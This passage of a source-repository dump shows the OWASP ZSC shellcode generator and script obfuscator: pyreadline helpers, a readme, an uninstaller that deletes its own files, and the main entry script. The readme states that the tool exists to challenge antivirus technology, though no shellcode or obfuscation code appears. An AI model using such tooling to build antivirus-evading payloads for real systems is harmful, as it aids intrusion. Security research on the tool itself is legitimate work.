84 |                'Programming Language :: Python :: 3.3',
85 |                'Programming Language :: Python :: 3.4',
86 |                'Programming Language :: Python :: 3.5', ]
87 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/test/__init__.py:
--------------------------------------------------------------------------------
1 | from __future__ import print_function, unicode_literals, absolute_import
2 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/test/common.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | #*****************************************************************************
 3 | #       Copyright (C) 2006  Michael Graz. 
 4 | #
 5 | #  Distributed under the terms of the BSD License.  The full license is in
 6 | #  the file COPYING, distributed as part of this software.
 7 | #*****************************************************************************
 8 | from __future__ import print_function, unicode_literals, absolute_import
 9 | from pyreadline.modes.emacs import *
10 | from pyreadline import keysyms
11 | from pyreadline.lineeditor import lineobj
12 | from pyreadline.keysyms.common import make_KeyPress_from_keydescr
13 | 
14 | import unittest
15 | 
16 | 
17 | class MockReadline:
18 |     def __init__(self):
19 |         self.l_buffer = lineobj.ReadLineTextBuffer("")
20 |         self._history = history.LineHistory()
21 | 
22 |     def add_history(self, line):
23 |         self._history.add_history(lineobj.TextLine(line))
24 | 
25 |     def _print_prompt(self):
26 |         pass
27 | 
28 |     def _bell(self):
29 |         pass
30 | 
31 |     def insert_text(self, string):
32 |         '''Insert text into the command line.'''
33 |         self.l_buffer.insert_text(string)
34 | 
35 | 
36 | class MockConsole:
37 |     def __init__(self):
38 |         self.bell_count = 0
39 |         self.text = ''
40 | 
41 |     def size(self):
42 |         return (1, 1)
43 | 
44 |     def cursor(self, visible=None, size=None):
45 |         pass
46 | 
47 |     def bell(self):
48 |         self.bell_count += 1
49 | 
50 |     def write(self, text):
51 |         self.text += text
52 | 
53 | 
54 | class Event:
55 |     def __init__(self, char):
56 |         if char == "escape":
57 |             self.char = '\x1b'
58 |         elif char == "backspace":
59 |             self.char = '\x08'
60 |         elif char == "tab":
61 |             self.char = '\t'
62 |         elif char == "space":
63 |             self.char = ' '
64 |         else:
65 |             self.char = char
66 | 
67 | 
68 | def keytext_to_keyinfo_and_event(keytext):
69 |     keyinfo = keysyms.common.make_KeyPress_from_keydescr(keytext)
70 |     if len(keytext) == 3 and keytext[0] == '"' and keytext[2] == '"':
71 |         event = Event(keytext[1])
72 |     else:
73 |         event = Event(keyinfo.tuple()[3])
74 |     return keyinfo, event
75 | 
76 | 
77 | #override runTests from from main in unittest to remove sys.exit call
78 | class Tester(unittest.TestProgram):
79 |     def runTests(self):
80 |         if self.testRunner is None:
81 |             self.testRunner = unittest.TextTestRunner(verbosity=self.verbosity)
82 |         result = self.testRunner.run(self.test)
83 | #       sys.exit(not result.wasSuccessful())
84 | 


--------------------------------------------------------------------------------
/module/readline_windows/pyreadline/unicode_helper.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: utf-8 -*-
 2 | #*****************************************************************************
 3 | #       Copyright (C) 2007  Jorgen Stenarson. 
 4 | #
 5 | #  Distributed under the terms of the BSD License.  The full license is in
 6 | #  the file COPYING, distributed as part of this software.
 7 | #*****************************************************************************
 8 | import sys
 9 | 
10 | from .py3k_compat import unicode, bytes
11 | 
12 | try:
13 |     pyreadline_codepage = sys.stdout.encoding
14 | except AttributeError:
15 |     # This error occurs when pdb imports readline and doctest has replaced 
16 |     # stdout with stdout collector. We will assume ascii codepage
17 |     pyreadline_codepage = "ascii"
18 | 
19 | if pyreadline_codepage is None:
20 |     pyreadline_codepage = "ascii"
21 | 
22 | if sys.version_info < (2, 6):
23 |     bytes = str
24 | 
25 | PY3 = (sys.version_info >= (3, 0))
26 | 
27 | 
28 | def ensure_unicode(text):
29 |     """helper to ensure that text passed to WriteConsoleW is unicode"""
30 |     if isinstance(text, bytes):
31 |         try:
32 |             return text.decode(pyreadline_codepage, "replace")
33 |         except (LookupError, TypeError):
34 |             return text.decode("ascii", "replace")
35 |     return text
36 | 
37 | 
38 | def ensure_str(text):
39 |     """Convert unicode to str using pyreadline_codepage"""
40 |     if isinstance(text, unicode):
41 |         try:
42 |             return text.encode(pyreadline_codepage, "replace")
43 |         except (LookupError, TypeError):
44 |             return text.encode("ascii", "replace")
45 |     return text
46 | 
47 | 
48 | def biter(text):
49 |     if PY3 and isinstance(text, bytes):
50 |         return (s.to_bytes(1, 'big') for s in text)
51 |     else:
52 |         return iter(text)
53 | 


--------------------------------------------------------------------------------
/module/readline_windows/readline.py:
--------------------------------------------------------------------------------
 1 | # -*- coding: UTF-8 -*-
 2 | #this file is needed in site-packages to emulate readline
 3 | #necessary for rlcompleter since it relies on the existance
 4 | #of a readline module
 5 | from __future__ import print_function, unicode_literals, absolute_import
 6 | from pyreadline.rlmain import Readline
 7 | 
 8 | __all__ = ['parse_and_bind',
 9 |            'get_line_buffer',
10 |            'insert_text',
11 |            'clear_history',
12 |            'read_init_file',
13 |            'read_history_file',
14 |            'write_history_file',
15 |            'get_current_history_length',
16 |            'get_history_length',
17 |            'get_history_item',
18 |            'set_history_length',
19 |            'set_startup_hook',
20 |            'set_pre_input_hook',
21 |            'set_completer',
22 |            'get_completer',
23 |            'get_begidx',
24 |            'get_endidx',
25 |            'set_completer_delims',
26 |            'get_completer_delims',
27 |            'add_history',
28 |            'callback_handler_install',
29 |            'callback_handler_remove',
30 |            'callback_read_char', ]  #Some other objects are added below
31 | 
32 | # create a Readline object to contain the state
33 | rl = Readline()
34 | 
35 | if rl.disable_readline:
36 | 
37 |     def dummy(completer=""):
38 |         pass
39 | 
40 |     for funk in __all__:
41 |         globals()[funk] = dummy
42 | else:
43 | 
44 |     def GetOutputFile():
45 |         '''Return the console object used by readline so that it can be used for printing in color.'''
46 |         return rl.console
47 | 
48 |     __all__.append("GetOutputFile")
49 | 
50 |     import pyreadline.console as console
51 | 
52 |     # make these available so this looks like the python readline module
53 |     read_init_file = rl.read_init_file
54 |     parse_and_bind = rl.parse_and_bind
55 |     clear_history = rl.clear_history
56 |     add_history = rl.add_history
57 |     insert_text = rl.insert_text
58 | 
59 |     write_history_file = rl.write_history_file
60 |     read_history_file = rl.read_history_file
61 | 
62 |     get_completer_delims = rl.get_completer_delims
63 |     get_current_history_length = rl.get_current_history_length
64 |     get_history_length = rl.get_history_length
65 |     get_history_item = rl.get_history_item
66 |     get_line_buffer = rl.get_line_buffer
67 |     set_completer = rl.set_completer
68 |     get_completer = rl.get_completer
69 |     get_begidx = rl.get_begidx
70 |     get_endidx = rl.get_endidx
71 | 
72 |     set_completer_delims = rl.set_completer_delims
73 |     set_history_length = rl.set_history_length
74 |     set_pre_input_hook = rl.set_pre_input_hook
75 |     set_startup_hook = rl.set_startup_hook
76 | 
77 |     callback_handler_install = rl.callback_handler_install
78 |     callback_handler_remove = rl.callback_handler_remove
79 |     callback_read_char = rl.callback_read_char
80 | 
81 |     console.install_readline(rl.readline)
82 | 
83 | __all__.append("rl")
84 | 


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
 1 | OWASP ZSC
 2 | =========
 3 | 
 4 | 
 5 | 
 6 | ***THIS SOFTWARE WAS CREATED TO CHALLENGE ANTIVIRUS TECHNOLOGY, RESEARCH NEW ENCRYPTION METHODS, AND PROTECT SENSITIVE OPEN SOURCE FILES WHICH INCLUDE IMPORTANT DATA. CONTRIBUTORS AND OWASP FOUNDATION WILL NOT BE RESPONSIBLE FOR ANY ILLEGAL USAGE.***
 7 | 
 8 | 
 9 | OWASP ZSC is open source software written in python which lets you generate customized shellcode and convert scripts to an obfuscated script. This software can be run on Windows/Linux/OSX with python.
10 | 
11 |  * OWASP Page: https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
12 |  * Documents: https://www.gitbook.com/book/ali-razmjoo/owasp-zsc/details
13 |  * Home: [https://www.secologist.com/](https://www.secologist.com/)
14 |  * Features: http://zsc.z3r0d4y.com/table.html
15 |  * Github: https://github.com/Ali-Razmjoo/OWASP-ZSC
16 |  * Archive: https://github.com/Ali-Razmjoo/ZCR-Shellcoder-Archive
17 |  * Mailing List: https://groups.google.com/d/forum/owasp-zsc
18 |  * API: http://api.z3r0d4y.com
19 | 
20 | [![asciicast](https://asciinema.org/a/90674.png)](https://asciinema.org/a/90674)
21 | 
22 | #### For more information, read the document files in main directory or visit home page.
23 | 
24 | 
25 |          
26 | 


--------------------------------------------------------------------------------
/uninstaller.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | OWASP ZSC
 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
 5 | https://github.com/zscproject/OWASP-ZSC
 6 | http://api.z3r0d4y.com/
 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
 8 | '''
 9 | import os
10 | import sys
11 | from core import start
12 | from core import color
13 | #start.logo()
14 | if 'linux' in sys.platform:
15 |     if os.geteuid() is not 0:
16 |         sys.exit(color.color('red') + 'Sorry, you most run this file as root.'
17 |                  + color.color('reset'))
18 |     os.system('clear')
19 |     print(color.color('green') + 'Removing Files' + color.color('white'))
20 |     os.system('rm -rf /usr/share/owasp_zsc /usr/bin/zsc')
21 |     print(color.color('green') + 'Files Removed!' + color.color('white'))
22 | elif 'darwin' in sys.platform:
23 |     if os.geteuid() is not 0:
24 |         sys.exit(color.color('red') + 'Sorry, you most run this file as root.'
25 |                  + color.color('reset'))
26 |     os.system('clear')
27 |     print(color.color('green') + 'Removing Files' + color.color('white'))
28 |     os.system('rm -rf /usr/local/share/owasp_zsc /usr/local/bin/zsc')
29 |     print(color.color('green') + 'Files Removed!' + color.color('white'))
30 | elif 'win32' in sys.platform or 'win64' in sys.platform:
31 |     #import ctypes
32 |     #if ctypes.windll.shell32.IsUserAnAdmin() != 1:
33 |     #	sys.exit(color.color('red')+'Sorry, you most run this file as admin.'+color.color('reset'))
34 |     print(color.color('green') + 'Removing Files' + color.color('white'))
35 |     installing_path = str(sys.prefix) + str('\\Scripts\\zsc')
36 |     os.system('rmdir %s /s /q' % installing_path)
37 |     os.system('del %s\\..\\zsc.bat /f' % installing_path)
38 |     print(color.color('green') + 'Files Removed!' + color.color('white'))
39 | else:
40 |     sys.exit(
41 |         color.color('red') +
42 |         'OWASP ZSC currently supports uninstall on windows/linux/osx only, for other platforms please remove source files.'
43 |         + color.color('reset'))
44 | start.sig()
45 | 


--------------------------------------------------------------------------------
/version:
--------------------------------------------------------------------------------
1 | 1.1.0


--------------------------------------------------------------------------------
/zsc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | OWASP ZSC
 4 | https://www.owasp.org/index.php/OWASP_ZSC_Tool_Project
 5 | https://github.com/zscproject/OWASP-ZSC
 6 | http://api.z3r0d4y.com/
 7 | https://groups.google.com/d/forum/owasp-zsc [ owasp-zsc[at]googlegroups[dot]com ]
 8 | '''
 9 | import sys
10 | import os
11 | from core.compatible import *
12 | from core.start import logo
13 | from core.controller import _interface
14 | 
15 | def main():
16 |     ''' Main Fucntion '''
17 |     logo()  #zsc logo
18 |     _interface()
19 | 
20 | 
21 | if __name__ == "__main__":
22 |     check()  #check os and python version if compatible
23 |     main()  #execute main function
24 | 


--------------------------------------------------------------------------------